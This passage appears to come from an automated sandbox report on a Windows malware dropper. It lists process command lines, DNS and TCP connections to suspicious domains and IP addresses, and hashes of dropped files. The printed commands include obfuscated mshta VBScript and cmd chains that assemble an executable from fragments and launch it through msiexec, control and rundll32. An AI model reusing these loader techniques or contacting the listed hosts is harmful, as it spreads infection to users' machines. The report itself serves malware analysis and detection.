"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if "/paMxRK9ViV3PT5Jnz5" == "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" ) do taskkill -Im "%~nXz" /F

C:\Windows\SysWOW64\taskkill.exe

taskkill /F -Im "Sat0663b341399ee.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1500 -ip 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 956

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRIpt: cLosE ( CREAteobjEcT ( "WscRiPt.SHeLl" ). rUN ("C:\Windows\system32\cmd.exe /Q /r eCho NqN%TIME%> FvfG42h.8 & echo | Set /P = ""MZ"" > IiKZCUV.MQ & CoPY /Y /b iIKZCUV.MQ + 6H87pFZ.4 + FDKD47Ef.I1 + U56d.R + JB946RB.I7A + Q_tW.pL + BTDIJ1.FYL + FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM " , 0 ,True ) )

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1500 -ip 1500

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 988

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /Q /r eCho NqN%TIME%> FvfG42h.8& echo | Set /P = "MZ" > IiKZCUV.MQ & CoPY /Y /b iIKZCUV.MQ + 6H87pFZ.4 +FDKD47Ef.I1+ U56d.R + JB946RB.I7A + Q_tW.pL + BTDIJ1.FYL + FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>IiKZCUV.MQ"

C:\Windows\SysWOW64\control.exe

control .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe /y .\xHnBBPN.0kM

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1500 -ip 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 1016

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat0675f75df01bdb.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0675f75df01bdb.exe" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1500 -ip 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 1140

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "Sat0675f75df01bdb.exe" /f

C:\Windows\SysWOW64\control.exe

control .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 gazrxlog.xyz udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 whealclothing.xyz udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 my-all-group.bar udp
US 8.8.8.8:53 m525-blockchain31432.bar udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 46.3.26.104.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 215.133.67.172.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
N/A 127.0.0.1:60748 tcp
N/A 127.0.0.1:60750 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 99.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe

MD5 a979670adefae9ab376382f3229f3f28
SHA1 5b5b75a789e46a2f8ac02fba3d895fa968387c9b
SHA256 a8ae45e63487b6dd93bf61429d996be4abc922785e893717cdecd84b0b6f2040
SHA512 f023b21556d5ba5cd747f02ccc99ee1a27fea1d1c675615efa31664301b53dacb253f1b92356a8aea7ab0eba77e89d0fea7d0ba088bc17599fe55278e0fb744b

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/2684-46-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/2684-60-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3752-61-0x0000000073BCE000-0x0000000073BCF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0675f75df01bdb.exe

MD5 dd2fdd69b9db1cf5764dcfd429a1cf5e
SHA1 c45f13f1e2d166ff7ea70786d51b2fdd3bdea2e8
SHA256 d22db6b8e674124371143c301994af4326668dbdfe3dcdc5fdd949d066057afe
SHA512 c4aa0a831701e0ac9ca5bf7da6d46cd1a02d44248a2a4e85a3c79205182d245490245bdd90a357def492bb984249987097af70aed71331c12f8e238b10f2b60d

memory/4612-73-0x0000000004C60000-0x0000000005288000-memory.dmp

memory/4612-72-0x0000000073BC0000-0x0000000074370000-memory.dmp

memory/4612-71-0x0000000004590000-0x00000000045C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe

MD5 1cc8a64b178076dca421fedc3a248a56
SHA1 db8ed444965577dfb6db4f92ddd8d96a157ddea5
SHA256 1f7a19b62d2e0dfddefe2d8e829bd1af457806d61bc650aa9e3ed340a0886345
SHA512 c77b3c1ca13b18b6335b93106c285c4c9fdade11e0d1ab022cb4465228b2d8a0325a930e1b371e66973e36188fac023ae96eac0ff9921d63dc9734a38deb07ff

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0618d93ac2c5c.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06ebc37d1c94352.exe

MD5 e9133ca1a95483a3331d0f336685302d
SHA1 48c1348e20b26be8227ed63a1db0f13716f1b8e3
SHA256 1145ee6af1fb495cb10eda71b3377e5ff6a21224c613f598c1c736fb6eaac58b
SHA512 009c74131d2fa256e55a4735eee2b498a673a7857635e78f12e442b27025a99562356ccb8db15c4119e6b2ff477a07f85db8290f58f4821626bae0f729b61f57

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0619212f22dd7.exe

MD5 854ea0bc0602795b95da3be8257c530f
SHA1 f243a71edc902ed91d0f990630a73d0d01828c73
SHA256 c01e2d31948bc4de2df55929062171e7dbc85b84ee764b799520d6f0740e1e1e
SHA512 2a2b55cdbc3d62fc26af219d88b31f87782a8a550d273997d6d383a877c85529c8f0c7983c77ef4f176a2ce32119fd8733658aeb86de9215629c0e6012ce544c

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe

MD5 0e05650d436fd4d92775cd4f65973870
SHA1 4d13aaa6b18630d0c89400cee5933130f03bd762
SHA256 42c9a8d4eba1a23988476036c02318b3452e3ba835cb08786771ba63f6803b16
SHA512 6cf7a676cc7d5114293add15dd8fe029ef7e145183ac550600e7c0c85be33e0b2c42f0456838807971c4e122599a7d42fc33f44ca606cf24fbaaf8b43196ac08

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat060fd7e42d2.exe

MD5 29c9683aa48f1e3a29168f6b0ff3be04
SHA1 f2fde0bb1404e724387c4a4445d3e7c2c07d8d3f
SHA256 e46b9e2dd407bf942a3d19b75277ae6893a0b6c87e2df9d6047a9b35ebc53901
SHA512 a7092b9e781512a6f8f2fdcefb45cfb026a6e1f8762b06c0e969c8d52389d22e3d111ae67ba82bf49ad462953091def927ba911eb7dabee061f68d4aacde9891

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe

MD5 10e13cc7b41d162ab578256f27d297b1
SHA1 1d938b7e6e99951d9b8139f078483539120021e6
SHA256 7c91657c83118c91043fcdb9d616fbf219acc7ea7d793e3276e8ee801d1576c9
SHA512 22769c54259f0f82eed0f6d8d8c0d0040acf276baab8e75ed7832c771f1544939918ada9d1bc386acca0db84a0291f5932fff0f5d131e1127aff87811353e3cd

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe

MD5 7c6b2dc2c253c2a6a3708605737aa9ae
SHA1 cf4284f29f740b4925fb2902f7c3f234a5744718
SHA256 b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba
SHA512 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

memory/2684-59-0x0000000064941000-0x000000006494F000-memory.dmp

memory/2684-58-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2684-57-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2684-56-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2684-55-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2684-54-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2684-53-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2684-52-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2684-51-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2684-50-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2684-49-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2684-47-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/4244-83-0x00000000002B0000-0x00000000002CA000-memory.dmp

memory/4612-87-0x00000000052D0000-0x00000000052F2000-memory.dmp

memory/8-90-0x0000000000710000-0x0000000000778000-memory.dmp

memory/4612-100-0x0000000005550000-0x00000000058A4000-memory.dmp

memory/4612-89-0x00000000054E0000-0x0000000005546000-memory.dmp

memory/8-111-0x0000000002A00000-0x0000000002A1E000-memory.dmp

memory/8-106-0x0000000005070000-0x00000000050E6000-memory.dmp

memory/4612-88-0x0000000005470000-0x00000000054D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_htflkwkw.ify.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4244-86-0x0000000002320000-0x0000000002326000-memory.dmp

memory/8-112-0x0000000005810000-0x0000000005DB4000-memory.dmp

memory/3752-113-0x00000000065D0000-0x00000000065EE000-memory.dmp

memory/3752-114-0x0000000006AB0000-0x0000000006AFC000-memory.dmp

memory/2684-122-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3076-126-0x0000000000400000-0x0000000000883000-memory.dmp

memory/2684-125-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2684-124-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2684-123-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2684-120-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2684-116-0x0000000000400000-0x000000000051B000-memory.dmp

memory/3752-129-0x0000000006BA0000-0x0000000006BD2000-memory.dmp

memory/3752-130-0x000000006E870000-0x000000006E8BC000-memory.dmp

memory/3752-140-0x0000000006B80000-0x0000000006B9E000-memory.dmp

memory/3752-144-0x00000000077C0000-0x0000000007863000-memory.dmp

memory/4612-145-0x000000006E870000-0x000000006E8BC000-memory.dmp

memory/4612-159-0x0000000006BD0000-0x0000000006BEA000-memory.dmp

memory/3752-161-0x0000000007F40000-0x00000000085BA000-memory.dmp

memory/4612-163-0x0000000006F10000-0x0000000006F1A000-memory.dmp

memory/4612-164-0x0000000007100000-0x0000000007196000-memory.dmp

memory/4612-165-0x0000000007090000-0x00000000070A1000-memory.dmp

memory/4612-166-0x00000000070C0000-0x00000000070CE000-memory.dmp

memory/3752-167-0x0000000007B40000-0x0000000007B54000-memory.dmp

memory/3752-188-0x0000000007C30000-0x0000000007C4A000-memory.dmp

memory/3752-189-0x0000000007C20000-0x0000000007C28000-memory.dmp

memory/4612-195-0x0000000073BC0000-0x0000000074370000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Temp\IiKZCUV.MQ

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

C:\Users\Admin\AppData\Local\Temp\6h87pfZ.4

MD5 243a3d5a63c4d0f3a18a3d340f50ed8d
SHA1 4b5d7d91fdc7666d131ef4ed7524bdc1b024a009
SHA256 4da1a700d1dd30fa025a3682aa490680099d508a0b64fbdf8bac2f92914628a1
SHA512 64cd601f218c7ace06dd62ad41faf58d829b77f221fa444d2e347f52fa03210584f75448416e4910a0bb2058aafb8aaadcc9e9ea5c353cb29c352c23c6532ab1

C:\Users\Admin\AppData\Local\Temp\jB946RB.I7A

MD5 d4c89c7cabd256ccedd701e27b3fc31a
SHA1 c01e95b983215b9a08c807084185dbd17ccd32aa
SHA256 e7fe376512c6ba9b615d492961ef38a27b14d192b7c9751b75d9004370b5266c
SHA512 1d3d59c17368f3e264241fc5100971b74487d0bdc0e7902081a332314fdc59e07475f1aaeed17cd2bc1f64c59378ebe1b76e83ea046351d6691c647a60cbb421

C:\Users\Admin\AppData\Local\Temp\r6f7sE.I

MD5 bd3523387b577979a0d86ff911f97f8b
SHA1 1f90298142a27ec55118317ee63609664bcecb45
SHA256 a7e608f98f06260044d545f7279b8f859f7b7af98ac2b2b79a3cd7ac3b2dac36
SHA512 b37cb8daddb526312f6be439a3cb87fe62b69d44866df708f10eb148455f09f90b0dcee4360c1ae332d3936357fd4c474920aebec5aa8ddb005b617356c3d286

C:\Users\Admin\AppData\Local\Temp\XHnbBPN.0kM

MD5 008132f08399ae8927e41d1ea88ffe74
SHA1 c7d2551b905d578779533418e7a394fd94f17903
SHA256 439a6346ae58af4ce7d863d18b70b98e5628ea0f81cd740dd3b886fbe3a7246a
SHA512 36a05a28325fc92017f6c44e7a6d88abe15a935aef61aa0047926efdb1ec8d3359fdb9e02d4602d4738ad25503e0dbe66f26d45bbea7f10d219aaa015c210d4e

C:\Users\Admin\AppData\Local\Temp\BtDIj1.fYl

MD5 d17564f93bb4a4cf11c46726ea1fe74b
SHA1 84cbff97ff148296bf36898dcf640ad18eb317c9
SHA256 96a4ccf3bc2092c2198cad0beb6a6fdc26db7f59bb82bf4e476bbac6fc783ce0
SHA512 f327cac0e017ebdaa87e1a8ed40d3abfa5a7614250a9759d6ae62f0f7149aa8ee4a26bb74854ef3860ae8911d87b55803d1f4c0fd58d19507ac4b91eebbb48ff

C:\Users\Admin\AppData\Local\Temp\Q_tW.pL

MD5 40ba2d6fcce0565f8d90055a8fb9975b
SHA1 c7529fea938658e19d238200af795533cba13c5c
SHA256 df403d434bdcc3b3604349310c62ca68718f1388a3d9c6155e026ff685b555b6
SHA512 fd8dd7936d96952acaba5f96ff6116b17bc79f770b324945ba966b00e6b3ff6c9f6388bd402d3e5ad40d42a37123416fe904a7d15c749585593caecfcf46b816

memory/1760-222-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1760-225-0x0000000004F70000-0x000000000507A000-memory.dmp

memory/1760-227-0x0000000004EE0000-0x0000000004F2C000-memory.dmp

memory/1760-226-0x0000000004EA0000-0x0000000004EDC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Sat062000ca9aa6.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/1760-224-0x0000000004D00000-0x0000000004D12000-memory.dmp

memory/1760-223-0x0000000005300000-0x0000000005918000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\U56d.r

MD5 4d5164bd007e1af1a6b436b89fc98329
SHA1 808e5215729cff6daf37bfcac7af29e8959a7c26
SHA256 eaeb79cf3f2e99906d1b5f89b92fcb5555117f0a527247b5becbc78cf65cc434
SHA512 f977ced0b42db76bab7d79d35f6dad56bdbbde527ccde0f8810838d5364b89223f9ec673915ac9b0f595bad7251d3d17d1be479c8ed5bf56c19aac8470a6b668

C:\Users\Admin\AppData\Local\Temp\FdKD47Ef.i1

MD5 22e51c0e8d96e09cf8571ef2a4f91cfb
SHA1 46f3a3ad48c540816c110c67b8eab824ebeec8c1
SHA256 e296a4b63a6561115cab7809fb27eb85d3db864d59ecbce82b784d52572a83f1
SHA512 40e328acf47cbf6754b29b856e6a17e6cc15cf9b11b9e58b267fb26b14d598e71cefa266b43f552d51d81dca712e5024a77ca09fb1535ae54cb8586e8b5ccc7f

C:\Users\Admin\AppData\Local\Temp\ykifDQA.1

MD5 7b25b2318e896fa8f9a99f635c146c9b
SHA1 10f39c3edb37b848974da0f9c1a5baa7d7f28ee2
SHA256 723b3b726b9a7394ac3334df124a2033536b108a8eb87ec69e0a6e022c7dcd89
SHA512 a3b294e93e9d0a199af21ad50af8290c0e0aaa7487019480ca3ffd75aa8ad51c4d33612ec69275e4fa2273ca5e33fdfdf263bb0ce81ad43ce092147118fa8ca6

C:\Users\Admin\AppData\Local\Temp\7TcIneJp.0

MD5 6c83f0423cd52d999b9ad47b78ba0c6a
SHA1 1f32cbf5fdaca123d32012cbc8cb4165e1474a04
SHA256 4d61a69e27c9a8982607ace09f0f507625f79050bdf7143c7fe0701bf1fab8ae
SHA512 e3d1537f4b22ceadfef3b30216b63320b397a179ab9d5f1eb66f93811a2717ee1fb6222989f610acd4c33fae6078c3df510022b5748a4f1d88ebf08c12f9deec

C:\Users\Admin\AppData\Local\Temp\gUVIl5.SCh

MD5 973c9cf42285ae79a7a0766a1e70def4
SHA1 4ab15952cbc69555102f42e290ae87d1d778c418
SHA256 7163bfaaaa7adb44e4c272a5480fbd81871412d0dd3ed07a92e0829e68ec2968
